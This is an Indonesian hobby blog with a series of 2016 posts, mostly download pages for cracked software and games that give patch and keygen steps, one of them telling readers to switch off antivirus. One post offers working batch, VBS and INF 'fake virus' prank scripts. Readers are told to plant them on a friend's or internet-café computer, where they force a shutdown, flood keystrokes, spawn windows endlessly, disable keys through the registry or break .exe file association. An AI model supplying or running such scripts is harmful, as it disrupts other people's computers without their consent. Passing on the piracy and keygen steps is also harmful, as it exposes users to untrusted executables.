Thursday, March 31, 2016

Download PCMedik 7.5.25.2015 Full Version

Download PCMedik 7.5.25.2015 Full Version
SimBale

Hi whazzup sobat SimBale sekalian, kali ini saya akan share sebuah software yang sangat amat berfungsi untuk menunjang PC sobat. Namanya adalah PCMedik 7.5.25.2015 Full Version, software ini mampung memboost / mengoptimalkan kinerja PC sobat. PCMedik 7.5.25.2015 Full Version ini sizenya juga kecil namun manfaatnya sangatlah besar dengan sudah disertai crack maka software ini 100% Full Version alias gratis. Ngiler kan ayo kita tengok softwarenya.

Screenshots : 

Download PCMedik 7.5.25.2015 Full Version

Download PCMedik 7.5.25.2015 Full Version

Download PCMedik 7.5.25.2015 Full Version

Download PCMedik 7.5.25.2015 Full Version


Cara Instal :
  1. Download dan extract file setup terlebih dahulu
  2. Setelah itu buka folder PCMedik
  3. Install file "pcmedik.exe" dan tunggu hingga selesai
  4. Jangan jalankan terlebih dahulu
  5. Selesai.
Cara Patch :
  1. Download dan extract file rar patch terlebih dahulu
  2. Buka folder Patch PCMedik
  3. Pastikan dalam keadaan internet offline / tidak ada sambungan
  4. Lalu buka "PCMedikRegister.exe"
  5. Masukkan Nama dan Serial yang ada di "Serial Key.txt"
  6. Kemudian Klik OK / Register
  7. Selesai. 
Download Link :
Password File :



Semoga bermanfaat
Best Regards
Admin - Aditya

Wednesday, March 30, 2016

Download Game Area 51 Full Version RIP

Download Game Area 51 Full Version RIP
SimBale

Hello whazzup sobat sobit SimBale Blog yang admin kasihi (cielah). Oke kali ini kita bakal share buat kalian semua sebuah game yang udah terbilang lama tapi cocok buat komputer / pc / laptop yang spesifikasinya rendah, sekadar buat hiburan sob heheheh... Namanya Game Area 51 Full Version RIP. Jadi yang disini suka game shooting low spek ini nih boleh dicoba, oya game ini tidak perlu diinstal lagi karena sudah diinstal sebelumnya. Walaupun bentuknya udah instalan sizenya masih tergolong kecil kok, oke dicoba dulu kang...


Screenshots :


Download Game Area 51 Full Version RIP


Download Game Area 51 Full Version RIP

Cara Instal :
  1. Download dan extract file setup terlebih dahulu
  2. Setelah itu buka folder Area 51 Full Version RIP
  3. Jalankan A51.exe
  4. Selamat bermain :D
  5. Selesai. 
Download Link :
Password File :



Semoga bermanfaat
Best Regards
Admin - Aditya

Tuesday, March 29, 2016

Cara Mudah Mengetahui Spesifikasi Laptop / PC

Cara Mudah Mengetahui Spesifikasi Laptop / PC
SimBale


Selamat pagi sobat SimBale Blog, pagi-pagi gini udah terima request dari temen sendiri gimana cara nyari tahu spek laptop sendiri, dari pertanyaan itulah muncul sebuah ide untuk membuat bahan postingan di blog. Cara Mudah Mengetahui Spesifikasi Laptop / PC. Sebenernya ini hal yang mudah namun jika sobat tidak tahu bisa berbahaya, karena lama kelamaan bisa dikibulin tentang spek laptop. Yang mau tahu kelanjutannya silahkan scroll kebawah...

Screenshots :
Cara Mudah Mengetahui Spesifikasi Laptop / PC
Gambar 1

Cara Mudah Mengetahui Spesifikasi Laptop / PC
Gambar 2

Alat dan Bahan :
  • Sebuah PC / Notebook/ Laptop / Netbook
  • Sebuah jiwa pemberani dan penantang maut
  • Keyboard untuk mengetik
  • dan koneksi internet untuk ngeliat artikel ini :v
Langkah - langkah :
  • Tekan tombol logo Windows + R secara bersamaan maka akan muncul sebuah dialog box
  • Akan tampak seperti screenshots Gambar 1 diatas
  • Kemudian ketikkan "dxdiag" (Gambar 1) lalu tekan "Enter"
  • Maka akan muncul informasi spesifikasi laptop (Gambar 2)
  • Selesai.
Mudah kan sobat gimana apakah sobat sudah mencobanya?

Semoga bermanfaat
Best Regards
Admin - Aditya

Monday, March 28, 2016

Download Software Pengusir Serangga v1.02 (Tikus, Nyamuk, Kecoa)

Download Software Pengusir Serangga v1.02 (Tikus, Nyamuk, Kecoa)
SimBale


Selamat pagi sobat SimBale Blog semuaaaa, tadi malem agak terganggu ama nyamuk yang berisik dan bikin gatel aja, nah kebetulan browsing di internet nemu yang namanya Software Pengusir Serangga v1.02 (Tikus, Nyamuk, Kecoa). Sebenernya sih ane belum tau nih kebenerannya tapi apa salahnya dicoba dulu ya ga. Bagi yang mau download silahkan diread aja dulu.

Screenshots :


Download Software Pengusir Serangga v1.02 (Tikus, Nyamuk, Kecoa)


Download Software Pengusir Serangga v1.02 (Tikus, Nyamuk, Kecoa)

Cara Instal :
  1. Download dan extract file setup terlebih dahulu
  2. Setelah itu buka folder Pengusir Nyamuk v1.02
  3. Install file setup dan tunggu hingga selesai
  4. Aplikasi otomatis berjalan
  5. Selesai.
Download Link :
Password File :



Semoga bermanfaat
Best Regards
Admin - Aditya

Sunday, March 27, 2016

Fakta Alasan Setelah Kalah Maen Game!!!

 
SimBale


Ciee yang lagi mantengin SimBale Blog, saat ini admin lagi mau ngebangkitin blog yang udah lama admin tinggal ini. Sebelumnya saya udah share tuh banyak game mulai dari action, horor, survival, dll. Nah kali ini saya mau share Fakta Alasan Setelah Kalah Maen Game!!! What the f**k banyak banget pasti alesannya, nih mungkin kamu salah satunya cekidot.


Fakta Alasan Setelah Kalah Maen Game!!!


1. Nyalahin Konsol Game!

-> Ini adalah alasan pertama yang diucapkan ketika kalah maen game, misal kalah dalam bermain PES 2016 Ilustrasi : what the f**uck stiknye busuk, bodo licin nih stiknya, kabelnya nyangkut, tombolnye ga bisa dipencet 

2. Nyalahin Temen!

->  Ini adalah alasan kedua yang diucapkan ketika kalah maen game, misal mati pas misi maen GTA
Ilustrasi : eh gob**lok lu ganggu gue tadi, jangan senggol2 ta*i, pergi sana sempak firaun!

3. Nyalahin Laptop / PS!

->  Alasan yang ke 3 ini paling sering ane denger dari temen2 ane, misal lagi maen balap tiba2 macet / lag
Ilustrasi : Aduh ini kenapa leptop spesifikasinya jelek amet!, dasar laptop cuma bisa buat ngetik!, lama-lama gua bakar ni laptop!

4. Nyalahin Koneksi Internet / Server Lemot!

-> Ini biasa dijumpai diwarnet - warnet yang rame tapi koneksi ga mumpuni apalagi pas maen Point Blank
Ilustrasi : ini internet apa keong!, wah ini servernye pasti, wuaan**jrit apa2an nih lag gini!

5. Nyalahin Diri Sendiri!

-> Biasanya ini tipe orang2 yang pasrah dan bertanggung jawab atas kekalahannya di dunia game dengan menyalahkan diri sendiri
Ilustrasi : maafin gua bro tadi gua ngantuk ga fokus,  itu ketembak emang salah gua ga protect

6.  Nyalahin Ortu!

-> Ini yang paling ane ga suka, nyalahin orang tua karena kalah maen game 
Ilustrasi : Ini gara2 bokap gua tadi ga kasi duit jadi ga bisa bayar billing, sorry tadi gara2 emak gua telpon 

 7. Nyalahin Game!

-> Gua yang kali ini bener2 aneh, ane paling ngerasa aneh, udah mainin gamenya masih disalah2in juga
Ilustrasi : ini yang buat game giblik bener!, Gilak gamenya parah banget, Cacat nih gamenya!

NB : Apapun yang kita peroleh dari sebuah permainan jadikanlah sebuah pelajaran. CMIIW....

#Nih yang mau liat2 sambil download games klik disini

Semoga bermanfaat
Best Regards
Admin - Aditya

Cara Mengunci Folder Tanpa Software di PC / Laptop


Cara Mengunci Folder Tanpa Software di PC / Laptop
SimBale

Hiii sobat SimBale semua, ini merupakan kata-kata opening yang sulit dilepas ketika admin ngepos di blog ini pemirsa. Okeh kali ini admin akan membahas sebuah tips n trik yang unik tentang Cara Mengunci Folder Tanpa Software di PC / Laptop. Sebenernya sih ini cara lama, tetapi bagi sobat yang belum tahu menahu soal cara ini, dapat menyimak artikelnya dibawah ini.


Tutorial Cara Mengunci Folder Tanpa Software di PC / Laptop
    • Wajib memiliki notepad edisi berapapun, yang belum punya download disini
    • Buka Notepad sobat terlebih dahulu
    • Kemudian copas script yang ada dibawah ini ke dalam Notepad
          cls
        @ECHO OFF
        title Lock FolderRahasia by SimBale Blog
        if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
        if NOT EXIST FolderRahasia goto MDLOCKER
        :CONFIRM
        echo Apakah sobat ingin mengunci Folder Rahasia tersebut ? (Y/N)
        set/p "cho=>"
        if %cho%==Y goto LOCK
        if %cho%==y goto LOCK
        if %cho%==n goto END
        if %cho%==N goto END
        echo Ketik Y atau N.
        goto CONFIRM
        :LOCK
        ren FolderRahasia "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        echo FolderRahasia Terkunci
        goto End
        :UNLOCK
        echo Masukkan Password untuk membuka kunci
        set/p "pass=>"
        if NOT %pass%== PASSWORDSOBAT goto FAIL
        attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FolderRahasia
        echo FolderRahasia sudah di buka
        goto End
        :FAIL
        echo Password salah
        goto end
        :MDLOCKER
        md FolderRahasia
        echo FolderRahasia Sukses di buat
        goto End
        :End
    • Ganti kata "PASSWORDSOBAT" dengan password yang sobat inginkan
    • Lalu klik "Save As" dan beri nama Lock.bat pilih type All files
    • Klik file "Lock.bat" lalu akan muncul folder yang bernama "FolderRahasia"
    • Sobat dapat menyimpan file-file penting sobat di FolderRahasia tadi
    • Jika sobat ingin mengunci foldernya, sobat dapat mengklik lagi 2 kali file "Lock.bat" selanjutnya akan keluar pertanyaan "Apakah anda akan mengunci folder?" maka tuliskan disitu "Y" (tanpa kutip) jika sobat akan mungunci folder rahasia dan tuliskan "N" (tanpa kutip) jika sobat tidak akan mengunci folder rahasia.
    • Jika sobat ingin membuka atau melihat atau men-unlock folder rahasia tersebut cukup mudah tinggal klik lagi sebanyak 2 kali lagi lalu akan muncul tulisan "Masukkan Password untuk membuka kunci" lalu tuliskan passwordmu dan tarrraa,,,, folder pun muncul...
    • Selesai.
    NB : Kelemahan dari folder ini adalah dapat kelihatan jika disearch pada search file laptop sobat

    Semoga bermanfaat
    Best Regards
    Admin - Aditya

        Saturday, March 26, 2016

        Tips n Trik Jahil Fake Virus Via Notepad

         
        Tips n Trik Jahil Fake Virus Via Notepad
        SimBale

        Hello whazzup guys, bertemu lagi dengan saya admin - aditya di blog kesayangan kita SimBale. Oke kadang kita merasa jengkel ama temen kita, gara-gara kita dikerjain kita jengkel sendiri. Nah kali ini kita akan kerjain balik temen kita tetapi lewat perantara laptop / pc teman kita dengan Tips n Trik Jahil Fake Virus Via Notepad. Tenang aja ini hanya fake virus bukan virus asli jadi aman okey. Lalu untuk sistem kerjanya dan bahan - bahannya saya jelaskan dibawah ini :

        Alat dan Bahan :
        • Laptop / PC
        • Listrik
        • Mental n Keberanian
        • Seorang target sasaran
        • Internet n Jaringan Listrik
        • Notepad (Unduh disini)
        • Keyboard
        • Kemauan untuk jahil
        • Terakhir kopi :D
        Langkah - langkah
        • Membuat Forced Shutdown PC / Laptop
        -> Buka Notepad dan copy script dibawah ini :

        @echo off
        msg * This Computer Error
        shutdown -c "Error! Shutdown" -s 


        -> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
        -> Sebarkan File tersebut di Komputer teman sobat, maka Komputer korban akan otomatis Forced Shutdown
        • Membuat Tombol Caps-Lock Menyala Terus-Menerus
        -> Buka Notepad dan copy script dibawah ini :

            Set wshShell =wscript.CreateObject("WScript.Shell")
            do
            wscript.sleep 100
            wshshell.sendkeys "{CAPSLOCK}"
            loop 

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
        -> Sebarkan File tersebut di Komputer teman sobat, maka tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi)

        • Membuat Pesan Jail Muncul Terus
        -> Buka Notepad dan copy script dibawah ini :

        @ECHO off
        :Begin
        msg * pesan sobat 1
        msg * pesan sobat 2
        msg * pesan sobat 3
        msg * pesan sobat 4
        msg * pesan sobat 5
        GOTO BEGIN

        -> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
        -> Sebarkan File tersebut di Komputer teman sobat, maka pesan jail akan muncul terus. 
        NB : Sobat dapat mengganti "pesan sobat 1 - 5" sesuai dengan kemauan sobat. 
        • Membuat CD/DVD Room Membuka-Tutup
        -> Buka Notepad dan copy script dibawah ini :

            Set oWMP = CreateObject("WMPlayer.OCX.7")
            Set colCDROMs = oWMP.cdromCollection
            do
            if colCDROMs.Count >= 1 then
            For i = 0 to colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
            Next
            For i = 0 to colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
            Next
            End If
            wscript.sleep 5000
            loop

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
        -> Sebarkan File tersebut di Komputer teman sobat, maka CD-Room akan membuka tutup.

        NB : Bagi laptop / pc yang memiliki cd / dvd roomnya.
        • Membuat Script Muncul Terus
        -> Buka Notepad dan copy scipt dibawah ini :
          
        Set wshShell = wscript.CreateObject("WScript.Shell")
        do
        wscript.sleep 100
        wshshell.sendkeys "~(enter)"
        loop   

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file 
        -> Sebarkan File tersebut di Komputer teman sobat, maka script akan muncul terus menerus.
        • Membuat Tombol Backspace Menjadi Error (Mencet Terus)
        -> Buka Notepad dan copy script dibawah ini :

            MsgBox "kembali ke menu sebelumnya"
            Set wshShell =wscript.CreateObject("WScript.Shell")
            do
            wscript.sleep 100
            wshshell.sendkeys "{bs}"
            loop

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
        -> Sebarkan File tersebut di Komputer teman sobat, maka Tombol Backspace akan error dan menekan dengan sendirinya 
        • Membuat Pesan Pop Up Komputer di Notepad
        -> Buka Notepad dan copy script dibawah ini :

            Set wshShell = wscript.CreateObject("WScript.Shell")
            do
            wscript.sleep 100
            wshshell.sendkeys "Kamu Jelek!"
            loop 

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
        -> Sebarkan File tersebut di Komputer teman sobat, maka pesan "Kamu Jelek!" akan terus muncul
        NB :  Sobat dapat mengganti kata "Kamu Jelek!" sesuai dengan kemauan sobat.
        • Membuat Notepad Terbuka Otomatis 
        -> Buka Notepad dan copy script dibawah ini :

        @ECHO off
        :top
        START %SystemRoot%\system32\notepad.exe
        GOTO top

        -> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
        -> Sebarkan File tersebut di Komputer teman sobat, maka notepad akan terbuka terus menerus
        • Membuat Notepad dengan Pesan Jahil
         -> Buka Notepad dan copy script dibawah ini :

        WScript.Sleep 10
        WshShell.AppActivate "Notepad"
        WScript.Sleep 50
        WshShell.SendKeys "ka"
        WScript.Sleep 50
        WshShell.SendKeys "mu "
        WScript.Sleep 50
        WshShell.SendKeys "je"
        WScript.Sleep 50
        WshShell.SendKeys "le"
        WScript.Sleep 50
        WshShell.SendKeys "k "
        WScript.Sleep 50
        WshShell.SendKeys " se"
        WScript.Sleep 50
        WshShell.SendKeys "ka"
        WScript.Sleep 50
        WshShell.SendKeys "li"
        WScript.Sleep 50
        WshShell.SendKeys " y"
        WScript.Sleep 50
        WshShell.SendKeys "a"
        WScript.Sleep 50
        WshShell.SendKeys " h"
        WScript.Sleep 50
        WshShell.SendKeys "!"
        WScript.Sleep 50
        WshShell.SendKeys "!!

        -> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file 
        -> Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pesan jail akan terbuka terus
        NB : Sobat dapat mengganti kode berwarna ungu dengan selera sobat
        • Membuat Memilih jawaban seperti Quiz di Notepad 
        -> Buka Notepad dan copy script dibawah ini :

            WScript.Sleep 1800
            WScript.Sleep 100
            Set WshShell = WScript.CreateObject("WScript.Shell")
            WshShell.Run "notepad"
            @echo off
            title quiz hari ini :)
            :menu
            cls
            echo jika kamu kena virus apa
            yang kamu lakukan

            pause
            echo pilih yang mana :
            echo 1. matiin computer
            echo 2. format aja
            echo 3. bingung ahh
            set input=nothing
            set /p input=Choice:
            if %input%==1 shutdown -s -t
            30
            if %input%==2 del c:xxx
            if %input%==3 @ECHO off
            msg * muka lo rusak
            msg * ngaca dulu gih
            msg * hayo lo,cpu lu gw acak2
            msg * ud install ulang aja
            msg * biar masalah nya kelar
            @ECHO off
            :top
            START %SystemRoot%
            system32notepad.exe
            GOTO top

        -> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file
        -> Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pertanyaan akan terbuka
        NB : Sobat dapat mengganti kode berwarna ungu dengan selera sobat
        • Mematikan Tombol A-I-U-E-O pada Keyboard
        -> Buka Notepad dan copy script dibawah ini :

            [Version]
            Signature=”$Windows NT$”

            [DefaultInstall]
            AddReg =AIUEO

            [AIUEO]
            HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode               Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
            17,00,00,00,18,00,00,00,16,00,00,00,00,00 


        -> Simpan dengan nama "Jail.INF" >> type file : All File
        -> Log Off Komputer >> Tombol AIUEO pada keyboard sudah tidak berfungsi.

        Untuk menormalkan kembali, 
        -> Buka Notepad dan copy script di bawah ini :

            [Version]
            Signature=”$Windows NT$”
            [DefaultInstall]
            DelReg =normal
            [normal]
            HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map” 

        -> Save dengan nama "Normal.INF" >> type file : All File
        -> Log Off Komputer >> Normall !! 
        • Merusak Komputer Teman/Warnet
        -> Buka "CMD" dengan cara >> start >> run >> CMD
        -> Copy/ketik kode di bawah ini:

            ASSOC.exe=.hank 


         -> Lalu Tekan Enter!

        -> Cara Mengembalikan >> Buka CMD lagi
        -> Ketikan kode di bawah ini :

            ASSOC.exe=EXEFILE 
        -> Lalu Tekan Enter!

        NB : Mohon jangan disalahgunakan, Admin - SimBale tidak bertanggung jawab atas apa yang terjadi.
        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Friday, March 25, 2016

        Download Game Dead Island Terbaru Full Version Repack

        Download Game Dead Island Terbaru Full Version Repack
        SimBale


        Oke sobat bro gaming SimBale, sudah lama admin rasa tidak share artikel mengenai game kepada kalian semua (padahal baru 3 hari). Oleh karena itu kali ini admin - aditya akan share kepada kalian game bertema survival, horor, action pokoknya seru deh... Disini kalian para gamers dituntut untuk bisa menyelamatkan diri dan menyelesaikan misi yang telah dibuat tetapi kalian dikepung oleh para zombie yang ada di jalan-jalan dan di base penduduk, nama gamenya adalah Game Dead Island Terbaru Full Version Repack. Disini kalian juga bisa trade senjata dan item dengan cash dan bisa mengendarai mobil pula. Untuk lebih jelasnya silahkan kebawah....

        Screenshots :

        Download Game Dead Island Terbaru Full Version Repack

        Download Game Dead Island Terbaru Full Version Repack



        Minimum System Requirements :
        • CPU : Core 2 Duo 2.66 GHz
        • RAM : 1 GB
        • OS : Windows XP
        • Video Card : ATI Radeon HD 2600 XT 512MB VRAM (NVIDIA GeForce 8600 GT)
        • Free Disk Space : 7 GB
        Recommended System Requirements :
        • CPU : Core 2 Duo 2.66 GHz
        • RAM : 4 GB
        • OS : Windows 7
        • Video Card : GeForce 9600 (1 GB VRAM
        • Free Disk Space : 7 GB
        Cara Instal :
        1. Download dan extract file setup hingga selesai
        2. Buka folder Dead Island
        3. Jalankan Setup.exe
        4. Install setup hingga selesai 
        5. Selesai.
        Download Link :
        Password File :



        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Thursday, March 24, 2016

        Hal Yang Wajib Diketahui Seorang Hacker!

         
        Hal Yang Wajib Diketahui Seorang Hacker!
        SimBale

        Welcome to SimBale Blog, oke ketemu lagi dengan admin - aditya. Disini adakah diantara sobat sekalian yang mengaku dirinya hacker? Jika iya ada beberapa hal yang patut dan wajib diketahui oleh seorang hacker. So jika sobat tidak mengetahuinya sobat dapat membacanya dibawah ini. Rangkuman tentang Hal Yang Wajib Diketahui Seorang Hacker!


        • Bug
        -> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.
        • Patch
        -> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.
        • Vurnerable
        -> Sistem yang memiliki bug sehingga rentan terhadap serangan.
        • RFI
        -> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.
        • LFI
        -> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).
        • SQL Injection
        -> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.
        • DDoS
        -> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service. 
        •  Shell
        -> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.
        • Deface
        -> Merubah tampilan halman suatu website secara paksa dan illegal.
        • Debug
        -> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.
        • XSS
        -> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.
        • Phising
        -> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.
        • Keylogger
        -> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)
        • Fake Login
        -> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.
        • Fake Process
        -> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
        Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

        • Malicious Code/Script
        -> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.
        • Virus
        -> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.
        • Worm
        -> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.
        • Trojan
        -> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan. 
        • Backdoor
        -> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

        NB : Gimana sobat - sobat udah paham belum, kalo udah berarti udah siap jadi hacker dong  :D

        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Wednesday, March 23, 2016

        Download Notepad++ 6.9 Terbaru Free


        Download Notepad++ 6.9 Terbaru Free
        SimBale
        Gila panas banget hari ini ya bro, halo jumpa lagi dengan admin - aditya di blog kesayangan SimBale, oke pada hari yang cerah dan super duper panas ini admin akan share sebuah software yang notabene sudah diketahui oleh khalayak ramai. Software ini sering dibuat untuk menyimpan notice, membuat program, dll. Nama softwarenya adalah Notepad++ 6.9 Terbaru Free, kenapa disebut free? Karena dalam mendownload aplikasi yang satu ini tidak dipungut biaya sepeserpun  pemirsa alias gratis tis.. tis.. Jadi bagi sobat SimBale yang ingin mendownloadnya dapat menimak artikel ini hingga besok selesai

        Screenshots :


        Download Notepad++ 6.9 Terbaru Free


        Download Notepad++ 6.9 Terbaru Free

        Cara Instal :
        1. Download dan extract file setup terlebih dahulu
        2. Setelah itu buka folder Notepad++ 6.9
        3. Install file setup Notepad++ 6.9
        4. Tunggu hingga selesai menginstall
        5. Selesai.
        Download Link :
        Password :



        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Tuesday, March 22, 2016

        Download Corel Video Studio Pro X7 Full Version

        Download Corel Video Studio Pro X7 Full Version
        SimBale

        Selamat siang sobat kita SimBale, di hari yang cerah ini admin sedang libur dari kegiatan sehari-hari, jadi hari ini admin akan upload sesuatu yang baru lagi. Walaupun sedang senggang admin masih disibuki dengan kegiatan mengedit film, nah untuk menunjang performa editing kali ini admin - aditya akan share software yang saya pake sehari-hari untuk editing yang bernama Corel Video Studio Pro X7 Full Version, jeng jeng jeng jeng... Keren sob pokoknya kalo buat urusan edit mengedit, silahkan disruput filenya boss...

        Screenshots :


        Download Corel Video Studio Pro X7 Full Version


        Download Corel Video Studio Pro X7 Full Version

        Cara Instal :
        1. Download Corel Video Studio Pro X7 Full Version
        2. Extract file yang sudah didownload tadi 
        3. Jalankan Setup.exe, kemudian instal hingga selesai
        4. Jika sudah selesai, matikan antivirus terlebih dahulu
        5. Kemudian jalankan Corel Video Studio Pro X7
        6. Jika muncul notifikasi registrasi, klik Continue lalu Register later
        7. Tunggu sampai Corel Video Studio Pro X7 muncul
        8. Selesai.
        Cara Patch :
        1. Close softwarenya, tunggu sampai notifikasi aktivasi muncu
        2. Jika sudah muncul, klik Already Purchase
        3. Jalankan Keygen.exe, pilih Corel Video Studio Pro X7 v17.0
        4. Lalu copy serial yang muncul di Keygen
        5. Paste serial tadi di kolom Serial Number pada jendela aktivasi
        6. Kemudian klik Phone Corel maka muncul Installation Code di jendela aktivasi
        7. Ketik ulang kode tersebut di keygen (kolom Installation Code)
        8. Jika sudah diketik, klik "Activation" pada Keygen. 
        9. Copy kode yang muncul pada kolom Activation Code Keygen
        10. Paste di kolom Activation Code Corel VideoStudio Pro X7
        11. Klik "Continue"
        12. Selesai.
        Download Link :
        Password File :



        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Sunday, March 20, 2016

        Download Sony Vegas Pro 11.0.7 Terbaru Full Version

        Download Sony Vegas Pro 11.0.7 Terbaru Full Version
        SimBale
        Haloo sobat SimBale yang terberkatiii... hari ini saya Admin - Aditya akan share sebuah software editing yang mungkin sudah tidak asing bagi sobat editor semuanya, apalagi kalau bukan Sony Vegas Pro 11.0.7 Terbaru Full Version. Software editing yang stu ini dijamin ga kalah sama yang lain deh, dengan fitur yang up to date. Daripada bingung diceramahin terus mending langsung lets go to the tkp...

        Screenshots :

        Download Sony Vegas Pro 11.0.7 Terbaru Full Version


        Download Sony Vegas Pro 11.0.7 Terbaru Full Version 

        Cara Instal :
        1. Extract file rar setup yang sudah sobat download
        2. Buka folder Sony Vegas Pro
        3. Jalankan aplikasi setup Sony Vegas Pro
        4. Instal dan tunggu hingga selesai
        5. Selesai. 
        Cara Patch :
        1. Setelah install Setup Sony Vegas Pro 11.
        2. Setelah selesai disconnect koneksi internet
        3. Jalankan "Sony Vegas Pro 11 Patch.exe".
        4. Pilih program exe Sony Vegas Pro
        5. Lalu klik "Crack Me"
        6. Kemudian jalankan "Keygen.exe" dan Sony Vegas Pro-nya
        7. Jangan pernah exit dari keygen
        8. Pilih Product Name-nya "vegas pro 11.0 (32 / 64bit) series"
        9. Copykan Serial Number dari keygen ke Sony Vegas
        10. Klik Next pada vegas pro lalu pilih "Register from another computer"
        11. Isi data diri "First Name, Last Name, Country dan Email "
        12. Ceklist persetujuan Vegas Pro, lalu klik next
        13. Setelah itu, copykan Activation code dari keygen
        14. Klik "Finish" dan selesai.
        15. Selamat Vegas Pro sobat sudah full version.
        Download Link :


        Semoga bermanfaat
        Best Regards
        Admin - Aditya

        Download GTA San Andreas Portabel MOD Indonesia Full Version Repack

        Download GTA San Andreas Portabel MOD Indonesia Full Version Repack
        SimBale
        Selamat pagi sobat SimBale udah lama rasanya ga posting tentang game, berhubung kuota masih banyak and lagi liburan saya mau posting tentang sebuah game nih... Kali ini admin punya game yang akan admin post yakni GTA San Andreas Portabel MOD Indonesia Full Version Repack. Panjang amat ya sob judulnya hehehe, ya emang gini, ini adalah Game GTA tetapi versi MOD Indonesia dan repack dengan adanya kendaraan dan benda-benda khas dari Indonesia dan sizenya kecil tidak perlu instal karena portable dan repack. Bagaimana serunya Game GTA San Andreas ini? Yuk kita simak aja....

        Screenshots :


        Download GTA San Andreas Portabel MOD Indonesia Full Version Repack


        Download GTA San Andreas Portabel MOD Indonesia Full Version Repack

        Cara Instal :
        1. Download terlebih dahulu file
        2. Masukkan semua file part rar kedalam satu folder ang sama
        3. Jika sudah extract file yang masih dalam bentuk .rar
        4. Lalu tunggu hingga selesai
        5. Mainkan gamenya.
        Download Link :
        Password File :



        Semoga bermanfaat
        Best Regards
        Admin - Aditya